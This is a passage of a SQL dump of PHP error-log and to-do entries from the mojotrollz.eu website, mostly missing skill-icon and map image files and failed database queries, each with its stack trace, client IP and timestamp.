'87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_dualwield.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (753, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_eviscerate.png\' found.', 'd8a9280346528a28fbc01cd15ec8a5023d9e9d8e', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_e...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_e...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills&id=ability_rogue_eviscerate.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (754, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_weapon_halbard_01.png\' found.', 'e01364920cd7cf9898513bef8afc9651ba8c21b4', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_weapon_halb...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_weapon_halb...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2015-05-16 20:52:31', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=inv_weapon_halbard_01.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 3, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (755, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_sword_20.png\' found.', 'eeff61a36d020a29472e2d9e841b2c7b3cebeac8', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_sword_20.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_sword_20.pn...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=inv_sword_20.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (756, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_ancestralguardian.png\' found.', 'f2b182df9de3090c371d19e8aa7c55212bc33498', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_an...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_an...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_ancestralguardian.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (757, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_shockwave.png\' found.', '24bc739fa63b644eed6df1b4b0c690b8b27d2a76', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_shockwa...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_shockwa...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.016, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_shockwave.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (758, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_savageblow.png\' found.', 'ec600cbdd4695ea33751d42e5cb7f3a2640ee100', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_savageblow.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (759, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_bloodlust.png\' found.', 'ae6e41771a49b7187f5f27f01663fb2f390d074d', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_bl...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_bl...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_bloodlust.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (760, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_shield_05.png\' found.', 'ca53b44e3a3c4adca339cc5275ae58bce2207e1e', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_shield_05.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_shield_05.p...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:34', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=inv_shield_05.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (761, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Table \'host_mojotrollz.mojotrollz_tags_values\' doesn\'t exist', '01726f22c1d316d5e8223f78111f7cd73f9c294b', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT map FROM...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT map FROM...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(19): SYSTEM\\DB\\QQ::QQ()\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_player/saimod_mojotrollz_db_player.php(11): map::generate(6)\n#4 [internal function]: saimod_mojotrollz_db_player::sai_mod_saimod_mojotrollz_db_player()\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.016, '2014-12-14 19:25:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_player', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (762, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'${map_name}.png\' found.', 'f4b768ef938a6fed26d0573d41ee09573a2404f2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'map\', \'${map_name}.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'map\', \'${map_name}.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 19:41:00', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=map&id=${map_name}.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 9, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (763, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Kalimdor.png\' found.', '9a44ffb6526d9f75395adeff74f1afe028126854', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'map\', \'Kalimdor.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'map\', \'Kalimdor.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2015-01-03 21:24:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=map&id=Kalimdor.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 29, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (765, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Column \'id\' in on clause is ambiguous', '90d57cdcaae35c0ec5fa98652855f7101a0249ff', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT map, val...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT map, val...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(7): SYSTEM\\DB\\QQ::QQ()\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(20): map::generate(1)\n#4 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_creature(\'2\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.036, '2014-12-14 19:44:29', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (766, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: entry Verifier: INT', 'ba9e8004abbc98fac86ad71ba75c91865113de7b', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 183, '#0 /home/web/webdir/mojotrollz/system/api/api.php(43): SYSTEM\\API\\api::do_parameters_opt(Array, Array, 10, \'positions\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.004, '2014-12-21 23:09:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=positions&type=6&map=0&entry=null', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (767, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Unknown column \'entry\' in \'where clause\'', '623dae5baf2c043ea23ae79fb5f12cbc08c3b2aa', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\MAP_CREATUR...\', \'SELECT guid as ...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\MAP_CREATUR...\', \'SELECT guid as ...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(18): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(64): SYSTEM\\DB\\QP::QA(Array)\n#4 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(38): map::creatures(\'0\', \'36\')\n#5 /home/web/webdir/mojotrollz/mojotrollz/api/api_mojotrollz.php(20): map::positions(\'1\', \'0\', \'36\')\n#6 [internal function]: api_mojotrollz::call_positions(\'1\', \'0\', \'36\')\n#7 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#8 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#9 {main}', '37.24.148.242', 0.012, '2014-12-22 04:57:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=positions&type=1&map=0&entry=36', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (768, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Column \'id\' in where clause is ambiguous', '42284b61e49a14debbd3d15721e8db32d2a6b304', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\MAP_CREATUR...\', \'SELECT guid as ...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\MAP_CREATUR...\', \'SELECT guid as ...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(18): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(64): SYSTEM\\DB\\QP::QA(Array)\n#4 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(38): map::creatures(\'0\', \'6\')\n#5 /home/web/webdir/mojotrollz/mojotrollz/api/api_mojotrollz.php(20): map::positions(\'1\', \'0\', \'6\')\n#6 [internal function]: api_mojotrollz::call_positions(\'1\', \'0\', \'6\')\n#7 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#8 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#9 {main}', '37.24.148.242', 0.008, '2014-12-14 20:02:15', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=positions&type=1&map=0&entry=6', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (769, 'Exception', 'Beautify Player tooltip', '4bae20ac503d36b33111f4ae8800ffac11622085', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Beatify Player ...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 20:06:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Beatify%20Player%20tooltip', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (900, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\GET_TOPICS_BY_TAG_FAQ', '54efcab34a90fcc5675f432f9c618c73815920c5', 1, '/home/mojotrolls/mojo_zero/src/web/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\GET_TOPICS_...\')\n#1 /home/mojotrolls/mojo_zero/src/web/mojotrollz/page/user_nexus_menu_sub/user_nexus_menu_sub.php(26): spl_autoload_call(\'DBD\\\\GET_TOPICS_...\')\n#2 /home/mojotrolls/mojo_zero/src/web/index.php(12): user_nexus_menu_sub->html()\n#3 {main}', '176.199.143.215', 0.152, '2015-05-11 21:25:00', 'mojotrollz.eu', 80, '/?page=user_nexus_menu_sub&menu=2&', 'a:0:{}', 'http://mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36', 11, b'0', 0, 3, 1, 0, '2015-09-09 07:47:28'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (770, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Eastern Kingdoms.png\' found.', 'e45004beb7706f8e5a778a9662551d8d15aa3b9c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'map\', \'Eastern Kingdom...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'map\', \'Eastern Kingdom...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 20:11:46', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=map&id=Eastern%20Kingdoms.png', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (771, 'Exception', 'Beautify Creature tooltip', '864a33ab2325a7c3c9e9c5679373f24382ff6ef9', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Beautify Creatu...\')\n#1 